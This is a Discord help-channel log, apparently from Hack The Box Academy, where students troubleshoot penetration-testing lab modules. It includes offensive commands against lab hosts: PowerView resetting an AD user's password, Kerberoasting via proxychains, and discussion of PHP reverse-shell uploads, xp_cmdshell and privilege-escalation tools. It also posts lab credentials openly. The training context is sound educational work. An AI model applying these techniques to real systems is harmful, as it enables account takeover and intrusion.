You can ask for help and say "the guide says my command should work, but I'm not getting any results"

I'm also assuming you downloaded the footprinting-wordlist.txt to run the command with

@green minnow what module and question is this on?

But increasing the wait time -W will yield results

As smtp is a generally slow service

So between 15-20 second wait time and you'll get it

This is advice that's been posted in the channel ad nauseum about that section

is wait time controlled by -w or -W because if it's -W then the walkthrough text is wrong.

The walkthrough is increasing worker processes

But that doesn't make it work better

-W is wait time

"the -w option, which sets the maximum number of seconds for waiting for replies:"

Ah

Unless I'm misremembering

You can do smtp-user-enum --help

To see the flags and stuff to use with it

I don't think there even is a -W or -w

        With arguments: -m -u -U -s -S -r -t -M -f -D -p```

-t n Wait a maximum of n seconds for reply (default: 5)

adding -t 20 doesn't actually change the Query timeout ............ 5 secs though

https://www.kali.org/tools/smtp-user-enum/

I am confused

Are you using the same version? Different version, different arguments...

smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum ) is version

Not sure if it's the same module, but for one of them I ended using smtp_enum with metasploit and the provided wordlist. I remember smtp-user-enum not working so I just rolled to something else.

How can you have two -t options?

Yeah I just saw metasploit has a tool for this

good idea

But I've also had smtp-user-enum work, so like I said, not sure if it was a section issue, tool issue, or a layer 8 issue.

is smtp-user-enum.pl somehow different to smtp-user-enum even though they are both v1.2?

smtp-user-enum.pl is invoked with smtp-user-enum and is part of the pacman repo

so pentestmonkey just never fixed this?

learning to check check check everything hehe, the windows machine rdp'ed onto has an american keyboard so the @ symbol was giving me " when entering creds 😆

So I fixed it. You need to replace the contents of the script in /usr/bin/ with a fork where the issue is fixed https://github.com/pentestmonkey/smtp-user-enum/pull/2

Thing is this was fixed by this user in 2017. Why didn't pentestmonkey merge it?

Now the smtp-user-enum is working with -w set to 20 seconds.
Christ that took a lot of fixing. And it was apparently already fixed 7 years ago if the pull request was accepted!

Could it be that you are not using Kali or Parrot? It seems to be fixed in both distros.

I'm using Black Arch

I'm reaching out to the devs of black arch on github right now to tell them about this

I do wonder where Kali and Parrot are getting their version of smtp-user-enum though as the broken version is what's on pentestmonkey's github

And also confused as to why both versions have the same version number

No idea. Maybe it was fixed once and then added to the repos of the distros.

Likely a fix in their repos

I know parrot has the parrotsec gitlab

Is whoever pentestmonkey is just not active anymore? It's weird not to accept a pull request from 7 years ago that fixes the issue.

These things can happen with any software.

https://tenor.com/view/anakin-gif-1614955667706199731

When something you've been trying to get working for ages finally does

guys, i have a question. So how do i need to connect via ssh if i have permission denied

ssh sshuser@94.237.61.84 -p 22
The authenticity of host '94.237.61.84 (94.237.61.84)' can't be established.
ED25519 key fingerprint is SHA256:oXRFxErll+5X1LStJh/Fk8UDX7DQf4BhaHCGwGRAQYQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '94.237.61.84' (ED25519) to the list of known hosts.
sshuser@94.237.61.84: Permission denied (publickey).

ssh sshuser@94.237.61.84 -p 22
sshuser@94.237.61.84: Permission denied (publickey).

the password is qqww1122, but i cant connect

Use the port given from the target spawn.

If it’s a public ip, you’ll also receive a port

thx

Thanks discord for not loading this message before i typed

I was going through the windows fundamentals module, since it goes so deep I was wondering whether I need to memorise all of commands and stuff or just get an overview?

guys, sup again so

After successfully brute-forcing, and then logging into the target, what is the full flag you find?

so can someone give a hint whats a username

For what exactly?

For a theoretical test, practical exam, life, the academy modules?

Other than those proctored/monitored exams, there isn't any need to memorize anything

This has got to be the only way around slow target XRDP performance that I know of ― and it has the added benefit of all work being saved by default.

This is the Documentation & Reporting Practice Lab for context.

Alright I get it now. I should note it down though right?

What you find important, yes

It's always good to have the path you've taken and the commands you used

Stuck!

I'm on Module: getting started - Initial Foothold nibbles lab.

I've completed all the tasks (using the MSF module instead of the manual as I couldn't get the below to actually spawn a shell... frustrating!)

(see image 1 and 2)

Theres just no connection coming back - am I missing anything?

Forgot to include this. Yes I did upload the shell 😄 no Curling it does not change the outcome.

Why don't you create a common web shell to pass system commands then you run the commands for a reverse shell as a GET request parameters?

That worked, thank you!

was more of a stickler and following exactly as the module intended to, but finding an alternative shell works just fine thanks

Hi

Active Directory Enumeration & Attacks > ACL Abuse Tactics

why i got this error, even i copied and plastered directly without changing the command, anyhelp ?

PS C:\Tools> . .\PowerView.ps1
PS C:\Tools> $SecPassword = ConvertTo-SecureString 'transporter@4' -AsPlainText -Force
PS C:\Tools> $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)
PS C:\Tools> $damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
PS C:\Tools> Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose
VERBOSE: [Get-PrincipalContext] Using alternate credentials
VERBOSE: [Get-Domain] Error retrieving the current domain: Exception calling "GetCurrentDomain" with "0" argument(s): "Current security context is not associated with an Active Directory domain or forest."
WARNING: [Get-PrincipalContext] Error creating binding for object ('damundsen') context : Exception calling ".ctor" with "4" argument(s): "The server could not be contacted."

sounds like the domain controller isn't there, it thinks you aren't in a active directory environment

maybe reset the target and give it a few minutes to fully start all the services

9min not enough ?:(

Hey guys
I'm going insane
This hash is uncrackable
Idk what's wrong I've tried to modify it but hashcat never recognizes it

And I can't even paste it bc it's too long

Then it likely isn't the correct path.

This is intentional right?
Password Attacks - Network Services

I finished 3/4, stuck on this one.

whats the question

just finished the Web-Proxy Module, imo 100 cubes for this quick and easy Module is a big much :/

Are you using the correct user?

yeah im having the same issue

i got the button enabled but I cant tell if I did it right?

I don't know the user, I'm reusing whatever users I got from brute forcing logins for other protocols. I found 2 more users from SSH but none of the passwords work for either user for RDP

So something to think about, if you have any access to a windows host, perhaps you could enumerate the information you need through some basic host based enumeration.

I'll be back

Ligolo isn't a web proxy tool

Oh mb wrong module...

did that but now burp is hanging on the target and im unsure how to set the cookie

Should be an option to "add prefix" to your payload

i did that

||```
POST /admin.php HTTP/1.1
Host: 94.237.54.240:56708
Content-Length: 21
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://94.237.54.240:56708
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.54.240:56708/admin.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=21pddrkgvdampbnrn506jmevk5; cookie=4d325268597a6b7a596a686a5a4449314d4746684f474d7859544d325a6d5a6d597a63355954453359576f3d
Connection: keep-alive

user=admin&pass=admin

unsure what you mean by its "hanging" ¯_(ツ)_/¯

The cookie feels off to me

its 88 characters I dont know what to tell you

¯_(ツ)_/¯

I remember unencoding to get to 31 characters if memory and hint serves

Then in the payload options there's a section or button "add prefix"

I added the damn prefix

still nothing

The reponse is legit blank

nvm I had to reset the target we good

Sorry for being a little rude @fathom pendant

Hey guys, I’m having a little issue: as soon as I enable FoxyProxy and start BurpSuite, the webpage I’m trying to load won’t work anymore. Any idea why this might be happening?

Is intercept request turned on?

You can see in the Proxy tab

yeah

I also checked configuration

Do you fix the certificate in the burp?

yeah i downloaded and installed it in the browser

but it should work by default, as its pre configured and installed by HTB

hmmm

I didnt really change anything, I start the browser, turn on foxy proxy and start burp suite. Max I can get is the GET request, but then the site won't load

have you tried just using the built in browser with burp

yeah

can you reach the site normally in a browser

I think I got it.

Is burp intruder turned on?

Or w/e it is that catches requests :3

I didnt forward the request

my bad..but thanks

this feels like a dumb question, but im on the FTP page in Footprinting and this FTP server seems basically nonfunctional

like, ls doesnt work lmao

wdym doesn't work?

no output, error?

well I tried dir just now and got a 200 PORT command successful, then it just hangs

ill reset and see if that changes anything

yeah, same thing

it's not a big deal, they might just be using some crappy FTP software, but I want to get this damn flag anyway

I also tried using the wget trick they show you to just grab all the files, but that also errored out

yeah the ls command hangs for like a minute then prints 425 Unable to build data connection: Connection timed out

just to be absolutely certain, you're connected to the vpn?

yeah, I even redownloaded

ill also do that again. why not

if you go ps -aux | grep openvpn, how many instances do you have running?

oh shit, there's three. didnt realize that could even happen

thats chill, sudo killall openvpn and restart the connection

actually it looks like openvpn just uses three processes? like I killed it, started it up again, checked and theres three again

oh mb

if you ping the target machine, it pings back?

IMAP sessions as far as I’ve had them aren’t straightforward like ls cd etc, if you do a search for IMAP cheat sheet on google you should get the commands you need @iron patio

yeah it pings

this might be an ignorant question but what does FTP have to do with IMAP?

the help command worked and it listed ls and dir as valid commands

Haha sorry I misread

🤦‍♂️

np

maybe they just throttle the docker containers for these modules, so it's just too slow

that's my guess

How would you mitigate insecure deseralization with pickle module ?

For Nmap NSE module i am submitting the correct flag but it doesn’t accepts

from HTB to 3r}

not everything

careful not to post spoilers of the content/flags. also if it's not accepting the flag then you didn't input it right or it isn't the right flag.

Oh my bad

Also i was submitting the other flag.

Does anyone know why someone might choose to use rpivot as opposed to dynamic port forwarding? Having some trouble wrapping my head around this

Can someone give hint about username , its hard to wait 60 hours

Login Brute Forcing
Skills Assessment Part 1

What is the password for the basic auth login?,

Doesn't this module include a list of usernames and passwords in resources?

yep

I'm surprised then that none of them seem to be working for you

did u complete it?

Which module is this? I think a long time ago

Yo guys I have a question about linux privilege escalation. I am the Path Abuse section and I found the answer.

Review the PATH of the htb-student user. What non-default directory is part of the user's PATH?

My question is:

Skills Assessment Part 1

Login Brute Forcing

u got a question about skill assessement 1 on login brute forcing?

I can help

Ah no I haven't completed this one, thought this might be the password attacks section

Think simple user

I just ran it for funsies using your screenshot and the wordlists recommended and it was successful.

HOWWWW

Just using the content from that section.

ever tried bruteforcing the login?

My question is...how is /games not the answer to this queation. It is non-default

It fits the question.

You can shoot me a DM and I'll look at what you are running.

Pretty sure /usr/games & usr/local/games r default on parrot

Mm, ima check it out, it just seems illogical for games to be part of the PATH.

Got 3 more modules left, Windows priv esc, documentation and attacking enterprise networks.

Ok so obviously these do the same thing opposite ways but I was able to complete the rpivot section with ssh -D regardless

which module and section

or a general question

pivoting, Web Server Pivoting with Rpivot

Just not really understanding the partical use of reverse proxies in general ig

dm me

because maybe you can't bind a port, or you need to punch out from a firewall instead of punching through

Hello guys, I am stuck at the Shells & Payloads module with The Live Engagement at the following exercise:

**What language is the shell written in that gets uploaded when using the 50064.rb exploit? **

So I thought this would be easy since they posted about this 50064 exploit on the blog, so I tried to import it into msfconsole and run it. But it said:

[] Got CSRF token:
[] Logging into the blog...
[-] Login failed! Status code 404
[-] Exploit aborted due to failure: unexpected-reply: 172.16.1.12:80 - Authentication Failed
[*] Exploit completed, but no session was created.

Which is strange since I give it the right credentials (found at the desktop and in the hint)
So next I tried to manually exploit it so I looked at what the exploit was doing and found out it is uploading a php shell with a png header to a specific endpoint. I managed to upload a php reverse shell crafted with msfvenom and gave it a png header but when I then navigate to the directory where it should be stored, I won't get a shell back but just get the content of the payload as output.

Is there anyone who can help me with fixing the msfconsole or with fixing the payload to get interpreted correctly?

what did you mean by this

subdomains exist :)

I tried subdomain enum

try resetting the target, i'm also assuming you're running this from the target foothold

how did you try subdomain enum, remember this is a virtualhost so the http://FUZZ.domain.tld won't work

|| gobuster vhost -u http://inlanefreight.htb:34651 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain||

try adding --domain inlanefreight.htb

i'm assuming as well you added inlanefreight.htb to your hosts file

Allright I'll try resetting it. Yes I am running it from the target foothold

yup sure did

how did you add it?
ip inlanefreight.htb
?

yes

[do not put port in the hosts file]

(covering bases

i didnt do that lel

Still getting the same error when trying to exploit with msfconsole 😭

I don't remember if this is necessary to exploit that host (I'm guessing it is) but you could likely look through the exploit and identify the language the shell is written in that way.

Yeah I got the answer that way hahaha but for the next one I need to get the flag on the host so I’ll need to get a shell

CLM bypass killing me

Like apparently it 'doesn't work' or something??

Paths are different because applocker

Hi?

why i can not go into the modules?

what do you mean?

https://ibb.co/DftT7pR

this is what i mean

Bump. Can anyone please help me with this?

idk reach out to support on the site or try using the links on the navigation pane on the left

hmm, that's weird

maybe disable add-ons

ill try thanks!

same issue i logged in using the private browser

You can DM me.

||im not tripping am I? i found the path http://faculty.academy.htb:40654/courses/***-***.php7 that should be it in refrence to the third question ||

I've already solved it. Thanks for offering to help tho.

Replace the number with PORT

Bruh

:)

I GOT IT RIGHT😭

https://tenor.com/view/pain-gif-1403032518276698891

This is almost as bad as the expert labs

can i complete all three job role paths? or i can only pursue and complete any one of them (with silver annual) ik its written still i am confused

You can complete all of them as long as your subscription is active

Thanks

sqlmap essentials - Tried using every --tamper in the list, using -r req.txt with request copied from burp (axxxxx.php POST with JSON parameter)
I added --random-agent, --chunked
used --batch and restricted the techinques to BEU to skip the positive answer of time-based
I clearly cannot understand what I am doing wrong 😑
any other advices? hints?

Why can't it bounce back?

Hello there, can anyone help me out with "Windows Attack & Defence" module?

Stuck at Print Spooler & NTLM Relaying section

Hi

I'm on Windows Privesc " + 0 Using the techniques in this section obtain the cleartext credentials for the SCCM_SVC user. "

• cannot put anything on the "De^#!@ Sh@!#" access denied both on Pub and Priv (I'm logging as htb-student via smbclient)
• putting links on FS01 didn't sparked any interaction from sccm_svc user

Any hint please?

Try diff region maybe pwnbox is bugged

hi for Initial Enumeration of the Domain under Active Directory Enumeration & Attacks, I can't seem to xfreerdp into the machine. I can only do that using -X parameter when i do ssh

ssh -X htb-student@10.129.125.159
xfreerdp /u:htb-student /p:HTB_@cademy_stdnt! /v:10.129.51.131

The system becomes very laggy after this. I am getting an error 'ERROR][com.freerdp.client.x11] - failed to open display:' if i don't set -X

In the File inclusion module, in the skill assessment.
I don't have read access to /var/log/nginx/access.log, but a writeup online had read access to it.
how is this possible?

maybe they fixed an unintended way

no actually I was just going to say all I had to do is reset the machine and it worked.

it was giving me error 500 before.

ah okay, sometimes thos machines are buggy

yep lol

I got the answer.

Might help someone save time 😉

# Define the network share path
$sharePath = "\\Path\To\the share"

# Get all subfolders in the share
$subfolders = Get-ChildItem -Path $sharePath -Directory -Recurse

# Check each subfolder for write access
foreach ($folder in $subfolders) {
    $testFile = Join-Path -Path $folder.FullName -ChildPath "WriteTest.tmp"

    try {
        # Attempt to create a temporary file
        New-Item -Path $testFile -ItemType File -Force -ErrorAction Stop | Out-Null

        # If successful, output the writable folder
        Write-Host "Writable: $($folder.FullName)" -ForegroundColor Green

        # Clean up the test file
        Remove-Item -Path $testFile -Force -ErrorAction Stop
    } catch {
        # If an error occurs, it means the folder is not writable
        Write-Host "Not Writable: $($folder.FullName)" -ForegroundColor Red
    }
}

any updates on this?

After doing git clone https://gitlab.com/cryptsetup/cryptsetup.git How do I run it? There is no cryptsetup executable file, only the cryptsetup directory

Can someone DM me and explain 'dynamic front-end validation filters' in ''Code Review - Validation Logic Disparity' with a screenshots where to look for 'dynamic front-end validation filters'.

Read the docs/README

If I cancel htb academy subscription in the middle of a month. Will I get those days back after regaining the subscription (?)

the subscription will stay valid until you consume all the days of the month

I have 10 days left to be finished of monthly subscription. I will have to go somewhere urgent tomorrow. If I cancel my subscription & when I back after a couple of days, will I get the 10 days back (?)

It does not work like that

if you cancel your subscription, the current days will not stop being consumed

no you will still have access to the platform during this 10 days even if you cancel subscription now

IT will just not renew at the end

you can't pause it

ahhh, okay

in windows attack and defense kerberoasting the dictionary file 'passwords.txt' does not exist. I am stuck here

Hello everyone. I can't find this answers. This is File inclusion Submit the contents of the flag.txt file located in the /usr/share/flags directory.

Is it under the 'Resources' tab on HTB?

Hello there for skills assessment in sqlmap, I managed to obtain the flag but it has a typo?

yea like yknow the flags are formatted as HTB{} right? But for some reason the sqlmap returns something like QTB{} or HYB{}

yea

kinda weird tbh

i meant its not working* lol misread your message

folks anyone done the malicious document analysis can help me to get peepdf working

So I'm doing the Password Mutations section in the Password Attacks module. I'm using Hydra, but obviously SSH limits how many tasks can be performed. Is there a faster way or just suck up the wait time with Hydra, I know it's powerful and I tried netexec (crackmapexec) and msfconsole. However, they take just as long if not longer.

module: MSSQL, Exchange, and SCCM Attacks
section: Introduction to MSSQL Server

I cant connect to the sql server with the supplied creds.
I rdp into the machine as the "student" user, but then it is impossible to connect to the server

has anyone come across this?

Have you looked at the hint? And try using FTP instead of SSH.

What creds are you using for connecting to the RDBMS?
Iirc there is one for RDP and another for the MSSQL Server

someone can help me pls?

With what?

i can't find this Submit the contens of the flag.txt file located in the /usr/share/flags directory

What module and section?

File inclusion

😦

Section?

first

What’ve you tried? Dm me

thats an error because of the time based sql attack. In a time based sql attack the tool measures the time it took to execute a sql injection query to extract characters one by one. If your internet connection is a bit unstable the timing is off and it may accidentally detect the wrong character

hello, I'm in the "linux fundamentals" module and I got this question

Use CURL from your Pwnbox (not the target machine) to obtain the source code of the

"https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.```
i don't know how to answer it, no idea

Hi I've a problem with Dynamic Port Forwarding. I added Port 9050 to proxychains4.conf and connected to my target with ssh -D, basically like the module explains. However instead of getting:

ProxyChains-3.1 (http://proxychains.sf.net)
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jun 21 21:49:47 2022

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 172.16.8.3

<SNIP>

I'm getting:

[proxychains] DLL init: proxychains-ng 4.17
ERROR: nmblookup is not in your path.  Check that samba package is installed
ERROR: net is not in your path.  Check that samba package is installed
ERROR: rpcclient is not in your path.  Check that samba package is installed
ERROR: smbclient is not in your path.  Check that samba package is installed
WARNING: polenum is not in your path.  Check that package is installed and your PATH is sane.
WARNING: ldapsearch is not in your path.  Check that package is installed and your PATH is sane.
For Gentoo, you need to install the "samba" package
For Debian, you need to install the "smbclient" package

I'm able to run enum4linux without proxychains

You need to use curl from the AttackBox or your own VM. Just type curl https://www.inlanefreight.com

I did and now it shows an html code in my terminal, what this has to do with the answer I'm not getting anything

That's the source code they are talking about. Now you just have to filter for the unique paths. My guess would be using grep. I'm sure HTB explains it in the section.

the weird thing that htb really didn't explain it, so weird and now I'm lost and stuck in this

still stuck +2 more hours this morning, no email addy even. Last 3 Q's are killing me. Information Gathering - Web Edition final assessment.

DM me

install samba and smbclient packages

I already have, like I said enum4linux runs perfectly fine without proxychains

Hey guys I logged in today and found all my completed modules gone. Is there a way I can get these back???

Contact support

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

Thnx!

🤞

I can't find the File the flag.txt of File inlucusion. Someone can help me?

the SQLMAP Essentials module is so great

Anyone here done the "Password Reset Poisoning" from "Abusing HTTP Misconfigurations". Tried using all sorts of headers as you can see in the response of the intercept server:

Host: interactsh.local:40167
X-Forwarded-Server: interactsh.local:40167, interactsh.local
X-Forwarded-Host: interactsh.local:40167, interactsh.local:40167
X-Forwarded-For: interactsh.local:40167, 10.30.18.252
X-Host: interactsh.local:40167

However the password reset token is never given to me.

(edit: gotit)

Ok so I'm able to run proxychains together with curl, showmount and msfconsole. However if I try to run it with enum4linux I get this error message. This really confuses me. Anyone here who had the same issue or knows how to solve this?

Yo can you tell me how you fixed it?

Same issue here.

nvm got it

Hello. I'm having a problem with the Windows Fundamentals first challenge. I've gotten the RDP connection to work and it's telling me to figure out the build number and windows version using the get-wmiobject, but no matter how I type it into Powershell, it keeps telling me it's not a valid command. I've tried several different combinations of typing this in and have not gotten anything involving Get-Wmiobject to be recognized.

I did not see a hint for the lab, I'll check again and try ftp instead.

that's PowerShell on Pwnbox. you need to RDP to the target machine and run the command on there

Well I thought I had it because the background changed to a windows background on the VM, but apparently not. At least when I opened my own computers powershell the command worked so I know Im not going insane. I'll just have to try again when I have another VM token.

another window should appear with Windows in it if you RDP, you may have accidentally clicked off it

I very well might have. I'll just try again later. Thanks for the help!

You probably did rdp but still opened the pwnbox powershell instead

did anyone else find the foothold machine DEAD SLOW on pivoting skills assessment

keep having to reset the target because it completely freezes up

https://academy.hackthebox.com/module/158/section/1441

nah this is unusable 😦

Anyone has any hint for introduction to nosql injection skills assessment 2? Kind of stuck at the forget password page

Yeah it’s really slow

You could probably use nxc to execute commands remotely

Nvm I thought u meant the next machine but still applies

Is anyone else having some serious trouble answering these basic questions on the linux fundamentals? I am putting in what I think are the right answers but the right answers seem to be totally off. For example the very first question about the machine hardware name? x86_64 is apparently the right answer? In what world is that the name of the machine. The questions feel extremely misleading.

Nxc? That’s a new one for me

Same with answering the MTU question and the kernel. I'm still stuck on those even though I'm putting in exactly what it wants. MTU of 1500 is the tun0. But this isn't right? I even tried ens3 and still wrong. I'm pulling my hair out for these basic questions that I know the answer to but HTB says is wrong.

Ah netexec

I did exactly that. Still wrong.

Yep. I'm logged in.

For which question? I am having trouble with three of them. kernel version, MTU question, and mail question.

Kernel version is 6.5.0

Weird. I'll try I suppose. I only have one machine spawn a day though. Any insight for the MTU question? Pretty sure that was correct as well. And the mail question I justed did echo $MAIL and that was wrong too.

I dunno. I don't want to give up on this but it's frustrating.

Was I on the wrong machine??

you have to be SSHed into the target machine

I do. Thank you so much. You've been patient and very helpful.

Hey can someone help with this, still running into the scenario where it works on my local machine, works on their vm but the flag wont generate

This has happened for both Static and CLM, the only sections I cant pass are the ones where they do a "check" to generate a flag

ls

Hey guys
Ad module - skill assessment part 2 - Q7
I can login to the sql server but it's not very useful.
When I try to use xp_cmdshell on other directories I always always get error 5 access denied
Also tried to create another user and give him xp_cmdshell permissions but I also get error 5.
When I tried to use revshell.com it says "write to the server failed"
I tried to use loads of different metasploit modules and not one connects back to give me a meterpreter, I tried this both while pivoting and without and it never connects back but I can login to the sql server with user n*****

Help, im trying to connect to a linux host from DCsync section, but i keep getting errors, this image is where i tried to directly rdp into that machine, the other time when i tried to ssh from windows i got faced with a premission denied error

<@&861185840277487616>

I used printspoofer + nc

bruh so am i stuck for like forever?

can somone check please?

i rdped into the machien from Windows, but i got the same login screen with the same error, so i cant access both IPs, only 10.129.72.94 is accessable

<@&861185840277487616>

is it normal to not be able to ping a htb's machine from pwnbox? I can't do it in the Windows fund module

you answered your own question on accident:)

Windows doesnt respond to pings by default

👍

reset target and try again

why? xd

ask in #starting-point

man ftp

Have the annual subscription and apparently my code isn't valid because I dont put the code into a try{} statement

Hey guys! I'm new here and to HTB, so I would like some advise on few modules for Penetration Testing path. I'm currently enrolled in the Penetration Testing path and going through the academy module layout I have see a few modules that are "general" I have already completed the "Learning Process", "Linux Fundamentals", and "Windows Fundamentals". For the "Introduction To Network" I already know about networks so I skip over that one while I'm currently learning about web requests on my own before seeing it on HTB, but for "Introduction To Web Requests", "JavaScript Deobfuscation", and "Introduction Of Active Directory" I don't know much about. With all of that, I would like to know which I should do first before going deep into the Penetration Testing path.

Do whatever interests you the most

Okay, I will do that. Thanks for replying!

If your purpose is to complete the pentest path it will really depend on your current skill. The "Intro to AD" & "Intro to web requests" can be really usefull if you don't know much things about those stuff. I think that the "JS deobfuscation" module is less needed for this path

Those currently going through the AD Enum and/or WinLPE modules can thank me later for this: https://github.com/kennystrawnmusic/Evil-NtObjectManager

Thank you! I will take your advice.

@cerulean hinge , ability to help ont this? #modules message

hey

when you use ssh -X you're asking a protocol that was designed for text and light file transfer to do this work of handling a full blown gui

and then you're surprised when it gets sluggish

yeah. Any solutions for this? Because without the X, it does not work. Is it possible for me to rdp to the windows machine without ssh to the first linux machine? I have heard of pivoting, not sure if that is the solution for this

i get the error when I xfreerdp..

thats the solution for this

a bit of guidance? what module do I need to do? The one on Pivoting and Forwarding? What tool can I use? Or maybe an article I can learn from quickly haha

yeah

one would think the pivoting and forwarding module was listed as a prerequisite

ok i will do that first. thanks for replying

Hello everyone. On the module 'File transferts' section 'living off the land' the upload with certreq was impossible. Do you have tips for me? Have a nice day

you too

Yes

How did you bring the file on sql01?

Anyone else stuck on XSS: Phishing

I keep trying to put the payload in but it keeps throwing me invalid url

What tip u need

Like where u stuck

Hello

For the next 5 minutes I can help somebody who is doing cpts path

And is before the end of ad attack assessment

I am about to become the master

@rustic sage #cpts

nm, it's a module not the test

Each Time I tried I got an error like '-Post invalid parameter'

If you get an error when running certreq.exe, the version you are using may not contain the -Post parameter. You can download an updated version here and try again.

u need to update it

the here is in ur module

i remember having to update it

this is my problem, still stuck with it

ehe use grep and sort and stuff to filter out links

bro I'm too new to this

This is the regex version cos I can't type out the intended for the life of me can't remember it

curl https://www.inlanefreight.com > inlanefreight.txt && cat inlanefreight.txt | grep -Ro "https://www.inlanefreight.com[^'\"]*" | sort -u | wc

and what does "unique paths" even mean

just means no duplicates

oh ok

study the command I sent

incorrect answer again

it shows 96

I prollyy did something wrong

-_-

this is my 3rd day in the same problem

it's almost correct ig

Can anyone assist me with Windows Attack and Defense? I am confused on the password.txt file with in the section Keberoast. I was able to move the file over from the windows machine using the SMB client. Closed the RDP and now I am lost.

https://forum.hackthebox.com/t/use-curl-from-your-pwnbox-not-the-target-machine-to-obtain-the-source-code-of-the-https-www-inlanefreight-com-website-and-filter-all-unique-paths-of-that-domain-submit-the-number-of-these-paths-as-the-answer/260723 someone posted the solution on htb forum too

curl https://www.inlanefreight.com | tr " " “\n” | cut -d"‘" -f2 | cut -d’"’ -f2 | grep www.inlanefreight.com | sort -u | wc -l

Ironically this does count a duplicate twice and misses out one unique domain but you get to the same answer

With xp_cmdshell

Come on hack the box, I get it this is suppose to be learning and we are suppose to teach our selves but man I gotta jump 10 sections to use the kali target just to finish the first section of Windows Attack and Defense. Come on man. 10 hours of wasted time and that all I had to do. WOW just wow

──╼ $sudo proxychains GetUserSPNs.py -dc-ip 172.16.8.3 INLANEFREIGHT.LOCAL/mssqladm -request-user ttimmons
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.13.0.dev0+20240916.171021.65b774d - Copyright Fortra, LLC and its affiliated companies

Password:
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.8.3:389 ... OK
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation

acmetesting/LEGIT ttimmons 2022-06-01 13:32:18.194423 <never>

[-] CCache file is not found. Skipping...
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.8.3:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.8.3:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.8.3:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.8.3:88 ... OK
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

Hi guys i am new around here so i am please to meet you all!

hello, please red #welcome and #rules

Nothing like that has been mentioned in the module neither has it been used before in the SOC Analyst path to my knowledge

are there any plans to update crackmapexec module thats tier 3? seems as most probably know by now that the team moved under a different project due to hostile takeover issues in the repo

Anyways I don't understand why is this happening.. Is it a working as desired bug?

┌─[eu-academy-1]─[10.10.14.152]─[htb-ac-1514306@htb-rdr11sjo4r]─[~]
└──╼ [★]$ apropos system
system: nothing appropriate.
┌─[eu-academy-1]─[10.10.14.152]─[htb-ac-1514306@htb-rdr11sjo4r]─[~]
└──╼ [★]$ apropos information
information: nothing appropriate.
┌─[eu-academy-1]─[10.10.14.152]─[htb-ac-1514306@htb-rdr11sjo4r]─[~]
└──╼ [★]$ apropos kernel
kernel: nothing appropriate.
┌─[eu-academy-1]─[10.10.14.152]─[htb-ac-1514306@htb-rdr11sjo4r]─[~]
└──╼ [★]$ apropos
apropos what?
┌─[eu-academy-1]─[10.10.14.152]─[htb-ac-1514306@htb-rdr11sjo4r]─[~]
└──╼ [★]$ apropos apropos
apropos: nothing appropriate.
┌─[eu-academy-1]─[10.10.14.152]─[htb-ac-1514306@htb-rdr11sjo4r]─[~]
└──╼ [★]$ apropos ping
ping: nothing appropriate.
┌─[eu-academy-1]─[10.10.14.152]─[htb-ac-1514306@htb-rdr11sjo4r]─[~]
└──╼ [★]$ 

@storm elk

apropos system is working for me on my pwnbox

but i am on eu-academy-3 , let me switch to 1

Yeah I just ran sudo mandb then the command is working

It's not initialized by default?

I just spawned a system

and worked out of the box

So it was some sort of glitch?

could be

the lab setup is a bit weird. you're not supposed to SSH into Kali for some of the lab sections, including the first few

if the questions ask you to RDP into WS001, then you aren't meant to SSH to the Kali box

only when it asks you to RDP/SSH to Kali should you do so

in the module shells and payloads in the section infiltrating windows they are using a metasploit exploit windows/smb/ms17_010_psexec and we got the same machine for answering the questions . but when i am trying the same exploit it is not working

i tried windows/smb/ms17_010_eternalblue

too

i can use psexec to get the shell but it needs creds and they didnt gave any ...

????

did you find the issue i'm in the same page

hello why doesnot my ping {target_IP} work? in parrot terminal

are u connected to the vpn

it is downloading the file how use their

once downlaoded execute this command sudo openvpn <file-u-downloaded>

that has been downloaded in my computer how to send it in parrot os @empty trout

use python3 http.server to downlaod that to your parrot

seach online how to transfer file with python http.server

dir

Can someone DM me and explain 'dynamic front-end validation filters' in ''Code Review - Validation Logic Disparity' with a screenshots where to look for 'dynamic front-end validation filters'.

Hello,
I'm stuck on question 2 of Intrusion Detection With Zeek in Working with IDS/IPS
I've used || tshark -r revilkaseya.pcap -q -z io,stat,0,"ip.src==A && ip.dst==B" with A the only ip I found in conversation in wireshark and B the given ip || but I can't get the good answer with that and I don't understand why... Could i discuss about it with someone ?

Pls I need help with this challenge on Linux commands. I was asked to find the config file that has been created after 2020-03-03 with size smaller than 28k and larger than 25k. I ran this command but got nothing on the terminal

find . -iname "*.config" -type f -newermt 2020-03-03 -size -28k -size +25k

I haven't done this module but config files on linux tend to be .conf

other than that, check that your current working directory is a good place to start, since you ran find .

Ok, lemme try this

Still didn't work 😩

